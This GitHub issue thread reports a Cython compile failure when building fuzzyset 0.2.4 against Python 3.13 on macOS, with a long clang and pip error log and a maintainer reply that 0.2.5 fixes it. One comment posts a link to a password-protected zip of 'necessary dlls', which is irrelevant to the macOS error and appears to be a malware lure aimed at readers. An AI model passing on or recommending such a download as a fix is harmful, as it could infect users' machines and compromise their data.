### ISSUE TITLE
failed to build 0.2.4 release against py3.13

### ISSUE THREAD

**Issue by chenrui333** [alpae/fuzzyset#39]
👋 running into some build issue with 0.2.4 release against py3.13, the error log is below:

```
      creating build/temp.macosx-14.0-arm64-cpython-313/private/tmp/pip-install-ad137j0_/cython_1fdc78fcb0fa4dca801b0e80689ead4f/Cython/Plex
      clang -fno-strict-overflow -Wsign-compare -Wunreachable-code -fno-common -dynamic -DNDEBUG -g -O3 -Wall -isysroot /Library/Developer/CommandLineTools/SDKs/MacOSX14.sdk -I/opt/homebrew/Cellar/bzt/1.16.34/libexec/include -I/opt/homebrew/opt/python@3.13/Frameworks/Python.framework/Versions/3.13/include/python3.13 -c /private/tmp/pip-install-ad137j0_/cython_1fdc78fcb0fa4dca801b0e80689ead4f/Cython/Plex/Scanners.c -o build/temp.macosx-14.0-arm64-cpython-313/private/tmp/pip-install-ad137j0_/cython_1fdc78fcb0fa4dca801b0e80689ead4f/Cython/Plex/Scanners.o
      /private/tmp/pip-install-ad137j0_/cython_1fdc78fcb0fa4dca801b0e80689ead4f/Cython/Plex/Scanners.c:10823:70: error: too few arguments to function call, expected 6, have 5
                                                    is_little, !is_unsigned);
                                                                           ^
      /opt/homebrew/opt/python@3.13/Frameworks/Python.framework/Versions/3.13/include/python3.13/cpython/longobject.h:111:17: note: '_PyLong_AsByteArray' declared here
      PyAPI_FUNC(int) _PyLong_AsByteArray(PyLongObject* v,
                      ^
      /private/tmp/pip-install-ad137j0_/cython_1fdc78fcb0fa4dca801b0e80689ead4f/Cython/Plex/Scanners.c:11019:70: error: too few arguments to function call, expected 6, have 5
                                                    is_little, !is_unsigned);
                                                                           ^
      /opt/homebrew/opt/python@3.13/Frameworks/Python.framework/Versions/3.13/include/python3.13/cpython/longobject.h:111:17: note: '_PyLong_AsByteArray' declared here
      PyAPI_FUNC(int) _PyLong_AsByteArray(PyLongObject* v,
                      ^
      2 errors generated.
      error: command '/opt/homebrew/Library/Homebrew/shims/mac/super/clang' failed with exit code 1
      error: subprocess-exited-with-error
  
      × Building wheel for Cython (pyproject.toml) did not run successfully.
      │ exit code: 1
      ╰─> See above for output.
  
      note: This error originates from a subprocess, and is likely not a problem with pip.
      full command: /opt/homebrew/Cellar/bzt/1.16.34/libexec/bin/python /opt/homebrew/lib/python3.13/site-packages/pip/_vendor/pyproject_hooks/_in_process/_in_process.py build_wheel /private/tmp/tmpemeggiry
      cwd: /private/tmp/pip-install-ad137j0_/cython_1fdc78fcb0fa4dca801b0e80689ead4f
      Building wheel for Cython (pyproject.toml): finished with status 'error'
      ERROR: Failed building wheel for Cython
    Failed to build Cython
    ERROR: ERROR: Failed to build installable wheels for some pyproject.toml based projects (Cython)
    error: subprocess-exited-with-error
```

relates to https://github.com/Homebrew/homebrew-core/pull/194018

full build log, https://gist.github.com/chenrui333/fccc882918ab0a1d087c6bb38eacd447

**Comment by Gelinus** [comment]
maybe this will help
https://www.mediafire.com/file/33h9a2mzmqf81fz/help_github.zip/file
Pass: xfp53
I put the necessary dlls in the archive

**Comment by alpae** [comment]
A fix is available in 0.2.5 on pypi
